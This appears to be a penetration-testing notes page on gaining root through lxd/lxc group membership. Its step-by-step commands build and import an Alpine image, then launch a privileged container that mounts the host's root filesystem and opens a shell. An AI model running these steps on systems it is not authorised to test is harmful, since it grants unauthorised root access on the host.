lxd/lxc group

If you belong to lxd or lxc group, you can become root

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

Linpeas result

./linpeas.sh # or just type id to check the lxd gropu assgined to current user.

Escalation Steps

Prepare tools and create an image

You can install in your machine this distro builder: https://github.com/lxc/distrobuilder (follow the instructions of the github):

sudo su
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

This will create two files: lxd.tar.xz and rootfs.squashfs.

Add the image

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image

Initiate LXD

# Let's initiate the container and keep all options default. 
lxd init

Create a container, add root path, and execute the container

lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh

PreviousDocker escape NextMoby Docker Engine PrivEsc

Last updated 2 years ago

hashtagLinpeas result

hashtagEscalation Steps

hashtagPrepare tools and create an image

hashtagAdd the image

hashtagInitiate LXD

hashtagCreate a container, add root path, and execute the container